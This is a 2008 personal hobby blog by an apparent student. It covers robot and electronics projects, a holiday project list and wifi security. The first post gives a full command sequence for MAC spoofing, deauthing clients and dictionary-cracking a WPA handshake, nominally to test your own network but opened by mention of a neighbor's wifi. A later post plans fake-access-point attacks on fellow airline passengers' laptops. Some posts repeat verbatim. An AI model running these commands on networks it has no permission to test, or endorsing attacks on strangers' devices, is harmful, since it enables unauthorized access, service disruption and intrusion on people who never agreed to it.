I noticed my neighbors wifi was protected with WPA-TKIP. Your wifi might use WPA. If you protect it (you should to guard against man in the middle attacks), you should not use WEP, because that protocol is broken. It doesn't matter how long or complex your password is, people can still get in. WPA is better, but because it involves users picking a password, there is a risk. To make sure your WPA is secure, fire up Backtrack 3 and type exactly the following, and after each line hit enter. Do not type the lines that are in parentheses.
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w wpa --bssid (bssid) wlan0
(new shell)
aireplay-ng -0 5 -a (bssid) wlan0
(wait for the handshake)
(test)
aircrack-ng wpa-01.cap
(test again)
aircrack-ng wpa-01.cap -w /pentest/wireless/aircrack-ng/test/password.lst
So what this does is take down your wireless card, change the MAC address, find the BSSID and channel of your network with WPA on it, then performs a deauth attack to force everyone off the network. When they reconnect, it listens for the handshake between the client and the AP. Once it has the hash, it uses a password list to brute force the hash and try to get the password. The bigger the password list, the higher chance you will get it.
The moral of the story is that if you want a secure network, chose a good password. Most people who will try to get at your network will use this attack method. If your password is not in the list, then they will never find it. There is a 28gig password list out there that contains every possible password for WPA (compressed its 70 megs). However, it is VERY doubtful that an attacker will use this because of the size and the amount of time it will take to try all of those. If for some reason you think a government is after your data, then they probably would use that list. In that case, use a VPN to connect to another network, and it doesn't matter if they see that traffic because it is all encrypted.
Wednesday, December 24, 2008
Thursday, December 18, 2008
Music
I started a folder on my site that I will be posting music that I recorded. Its here. Be sure to read README.TXT
Wednesday, December 17, 2008
Past Projects
Go here to see pictures and video of some of my past projects. There are two sets of pictures. The ones with the robotic hand are from a mod I did recently. I found a toy online called Piano Hand, which was a clear robotic hand that played piano music and wiggled its fingers like it was playing. It was $20. As soon as I got one, I realized that it was not as articulate as I thought; it has one motor that when going forward cycles the four fingers as if it were drumming them. When it is in reverse, it switches gears and moves the thumb in and out. So it can only move the thumb OR the fingers, and not at the same time. But I still thought it was really cool, but needed some help. The piano sound it played was really annoying, so I took the speaker out and bypassed the controller board entirely. I then took apart a Vex servo and modified it to control the motor from the hand. Then I hooked it up the a Vex microcontroller and a transmitter and shoved it all in a tissue box (it was then end of the year and I did all of this at school since the teachers had given up doing anything, so all I had was a tissue box). It was then really easy to plant the box somewhere and start moving the fingers from a room or 2 away.
The other pictures and video in there are from a remake I did of a R/C Chef Boyardee can. They were all taken on my phone, so they are lower quality. Sorry. Anyway, several years ago there was a commercial that you can watch here. I saw this commercial and thought nothing of it until I saw a page on m5industries.com (Jamie Hyneman's (from mythbusters) special effects shop wesite). Unfortunatly, they took the page down, but they had pictures of the can without a label on and you could see the electronics. I have the pictures saved somewhere (archive.org didn't save them) and I will post them when I find them. So anyway, once I saw those pictures, I thought it would be cool to build one myself. So I did. My friend helped me out. The videos are of it rolling and the pictures are the exploded view. I used an R/C car circuit and had a friend machine a flywheel that steered it. The cool thing is that is does not drive on 2 wheels, the entire can rotates around the electronics in the inside. I still have the can in my room, but it needs some repair. It also needs a real control system, not an iffy R/C circuit from a junk toy car. But it works.
So thats 2 projects that I did that are kinda cool. I will post more pictures and videos of projects in that same site later, and probably organize it with folders to.
The other pictures and video in there are from a remake I did of a R/C Chef Boyardee can. They were all taken on my phone, so they are lower quality. Sorry. Anyway, several years ago there was a commercial that you can watch here. I saw this commercial and thought nothing of it until I saw a page on m5industries.com (Jamie Hyneman's (from mythbusters) special effects shop wesite). Unfortunatly, they took the page down, but they had pictures of the can without a label on and you could see the electronics. I have the pictures saved somewhere (archive.org didn't save them) and I will post them when I find them. So anyway, once I saw those pictures, I thought it would be cool to build one myself. So I did. My friend helped me out. The videos are of it rolling and the pictures are the exploded view. I used an R/C car circuit and had a friend machine a flywheel that steered it. The cool thing is that is does not drive on 2 wheels, the entire can rotates around the electronics in the inside. I still have the can in my room, but it needs some repair. It also needs a real control system, not an iffy R/C circuit from a junk toy car. But it works.
So thats 2 projects that I did that are kinda cool. I will post more pictures and videos of projects in that same site later, and probably organize it with folders to.
Tuesday, December 16, 2008
real quick
I am working on all my my projects, and several are coming along great. In the meantime, DON'T USE INTERNET EXPLORER. Microsoft failed, and there is a giant hole that is currently unpatched in internet explorer 7 that can be used to extract passwords and other interesting information. If you haven't switched to Firefox already, you are an idiot. So go download Firefox 3, because it's way more secure and better in every way. Anyway, here's a sneak peek of the progress of the projects: the owl and email notifier are almost done. I got a lot of help from the Hak5 Forums. I also talked to my friend Bandit5317 who has been working on an xbox 360 laptop. You can check out the thread here. Come back soon for updates on the projects.
Thursday, December 11, 2008
Made it
Well, exams are over. which is a big relief. That also means that I will now be able to dedicate my time to the many projects I have planned. Kyle and I have created "The List". It is the list of projects that we will attempt over Christmas Break. So here is the version we have now, it will vary depend on cost and feasibility and time. If you find yourself continually asking 'Why?', it is probably because we can.
1. GBA within PSP within VirtualBox - We thought it would be funny to emulate a computer emulating a PSP emulating a Gameboy Advance.
2. Treehouse - There is a big oak tree in my backyard that my dad and brother and I build a small tree house in. It was fun, but has since become abandoned, so we will hopefully spend an afternoon working to add structures and platforms to it.
3. Mini Mammoth - I bought the materials to make a very tiny mammoth model. Here it is. We plan on assembling them with great frustration, and then encasing them in a cube of clear acrylic from my dad's office.
4. Aspire One - We are both getting an Acer Aspire One for Christmas and plan on doing various mods and hacks to it. Add more RAM, bigger battery, bluetooth, 32gig SD card, touchscreen, etc.
5. Various security experiments (hacks) - A tiny laptop means it is way easier to to security testing. I always like experimenting with hacking, so I will be practicing over the break. I think I will mess around with MiTM attacks and some USB SwitchBlade stuff. Also some session hijacking.
6. Styrofoam plate speaker - If you know how speakers work, then you will know that it is possible to make one using a styrofoam plate and an electromagnet. If you google it, you will find instructions.
7. Geocaching (finding and planting) - After I started Geocaching, I became addicted. So I got my friends involved. Kyle and Dylan and I will hopefully spend a day caching around. We also want to make one.
8. Laser at Dylans - Dylan and I started building a laser from instructions online. We bought the parts and spent a day working on it, but never got it working. The only thing we got was some sparking and buzzing. We are gonna finish it.
9. Cluster - My cluster has been sitting in my closet for this semester, doing nothing. I want to work on it more to allow me to remotely control it via VNC or SSH or something. I also want to get it working on the folding@home project. Also, I need a place for it to live. If you have an air conditioned room with free electricity and internet, please tell me.
10. Ammo box underwater camera housing - This is from KipKay. Basically cut a hole in a 50 caliber military ammo box, put in a plexiglass window, and stick in a camera. Ballast is dive weights and since the box is waterproof, just close the lid and you are good to go.
11. Homemade Stroboscope - This is just a strobe light with a custom circuit on it to change the flash frequency. If you dial it in, you can make things that are moving appear static. A good example is a fan. Wikipedia for more info.
12. Rockets - I love model rockets and strapping things to them. We definitely plan on launching various things into the air, maybe strap a camera to it or an accelerometer. I also want to rebuild my electronic launcher. Right now it is a light switch housed in a metal box. I can do better.
13. Stuff from here - I want to get into hardware hacking, so this page is great for starting out doing that. I really need to get my hands on an Arduino.
14. Palm Pilot Robot - Google it and you find a neat little project that basically drives some servos from a palm pilot. I have everything already except for the controller board. It is $60, and I'd really rather not spend that. However, I do have a Vex controller, so I am going to see if I can use that instead, although I don't think I will. The alternate will be an Arduino, but I still need to do research on it. Comment if you know if that will or won't work.
15. DIY projector - My LCD monitor broke. Sort of. The backlight fried. If I got to choose how it broke, I would choose that failure though because it is really easy to fix. I am working on installing LED backlights, but I realized that all a monitor is is a very thin LCD and backlights and stuff to evenly diffuse the light. So, if you get an overheard projector and slap the LCD on there, you get an instant projector. So I am going to try that.
16. flame thrower? - Yea, we found instructions to build a really scary flamethrower. I am still not sure if I should attempt this as I could, you know, die.
17. multitouch screen and AudioTouch - I am really interested in multitouch applications, so I want to build a multitouch interface with a webcam and glass pane (google it) and try to learn the language Processing, which just came out and is designed just for visualization for those kinds of things. AudioTouch is an open source project that I want to mess with.
18. USB owl notifier - I think I wrote about this. Heres the thread that I am discussing in to try to get this thing to work.
19. Ruben's tube - These things are just cool, so I want to try one at night.Maybe play with introducing different kinds of gasses to the propane mixture to change the color of the flames. You could get really complex and run some tubes along the outside of the main one and depending on the sound of the music, inject different gasses to change the color.
So thats the list.
Also, I am flying home tomorrow, so I want to see about wireless hacking on the plane. How you ask? Because, as we know, people are stupid. So they leave their wifi switch on, and they have it on autoconnect. This means that if I pretend to be a network, their laptop happily connects, and then I can tell it to do things. Prevention? Simply turn off your wifi when you are not using it. It saves battery, and is 100% more secure.
Thats all for now. Come back for updates on The List and completed projects.
1. GBA within PSP within VirtualBox - We thought it would be funny to emulate a computer emulating a PSP emulating a Gameboy Advance.
2. Treehouse - There is a big oak tree in my backyard that my dad and brother and I build a small tree house in. It was fun, but has since become abandoned, so we will hopefully spend an afternoon working to add structures and platforms to it.
3. Mini Mammoth - I bought the materials to make a very tiny mammoth model. Here it is. We plan on assembling them with great frustration, and then encasing them in a cube of clear acrylic from my dad's office.
4. Aspire One - We are both getting an Acer Aspire One for Christmas and plan on doing various mods and hacks to it. Add more RAM, bigger battery, bluetooth, 32gig SD card, touchscreen, etc.
5. Various security experiments (hacks) - A tiny laptop means it is way easier to to security testing. I always like experimenting with hacking, so I will be practicing over the break. I think I will mess around with MiTM attacks and some USB SwitchBlade stuff. Also some session hijacking.
6. Styrofoam plate speaker - If you know how speakers work, then you will know that it is possible to make one using a styrofoam plate and an electromagnet. If you google it, you will find instructions.
7. Geocaching (finding and planting) - After I started Geocaching, I became addicted. So I got my friends involved. Kyle and Dylan and I will hopefully spend a day caching around. We also want to make one.
8. Laser at Dylans - Dylan and I started building a laser from instructions online. We bought the parts and spent a day working on it, but never got it working. The only thing we got was some sparking and buzzing. We are gonna finish it.
9. Cluster - My cluster has been sitting in my closet for this semester, doing nothing. I want to work on it more to allow me to remotely control it via VNC or SSH or something. I also want to get it working on the folding@home project. Also, I need a place for it to live. If you have an air conditioned room with free electricity and internet, please tell me.
10. Ammo box underwater camera housing - This is from KipKay. Basically cut a hole in a 50 caliber military ammo box, put in a plexiglass window, and stick in a camera. Ballast is dive weights and since the box is waterproof, just close the lid and you are good to go.
11. Homemade Stroboscope - This is just a strobe light with a custom circuit on it to change the flash frequency. If you dial it in, you can make things that are moving appear static. A good example is a fan. Wikipedia for more info.
12. Rockets - I love model rockets and strapping things to them. We definitely plan on launching various things into the air, maybe strap a camera to it or an accelerometer. I also want to rebuild my electronic launcher. Right now it is a light switch housed in a metal box. I can do better.
13. Stuff from here - I want to get into hardware hacking, so this page is great for starting out doing that. I really need to get my hands on an Arduino.
14. Palm Pilot Robot - Google it and you find a neat little project that basically drives some servos from a palm pilot. I have everything already except for the controller board. It is $60, and I'd really rather not spend that. However, I do have a Vex controller, so I am going to see if I can use that instead, although I don't think I will. The alternate will be an Arduino, but I still need to do research on it. Comment if you know if that will or won't work.
15. DIY projector - My LCD monitor broke. Sort of. The backlight fried. If I got to choose how it broke, I would choose that failure though because it is really easy to fix. I am working on installing LED backlights, but I realized that all a monitor is is a very thin LCD and backlights and stuff to evenly diffuse the light. So, if you get an overheard projector and slap the LCD on there, you get an instant projector. So I am going to try that.
16. flame thrower? - Yea, we found instructions to build a really scary flamethrower. I am still not sure if I should attempt this as I could, you know, die.
17. multitouch screen and AudioTouch - I am really interested in multitouch applications, so I want to build a multitouch interface with a webcam and glass pane (google it) and try to learn the language Processing, which just came out and is designed just for visualization for those kinds of things. AudioTouch is an open source project that I want to mess with.
18. USB owl notifier - I think I wrote about this. Heres the thread that I am discussing in to try to get this thing to work.
19. Ruben's tube - These things are just cool, so I want to try one at night.Maybe play with introducing different kinds of gasses to the propane mixture to change the color of the flames. You could get really complex and run some tubes along the outside of the main one and depending on the sound of the music, inject different gasses to change the color.
So thats the list.
Also, I am flying home tomorrow, so I want to see about wireless hacking on the plane. How you ask? Because, as we know, people are stupid. So they leave their wifi switch on, and they have it on autoconnect. This means that if I pretend to be a network, their laptop happily connects, and then I can tell it to do things. Prevention? Simply turn off your wifi when you are not using it. It saves battery, and is 100% more secure.
Thats all for now. Come back for updates on The List and completed projects.
Subscribe to:
Posts (Atom)
Posts
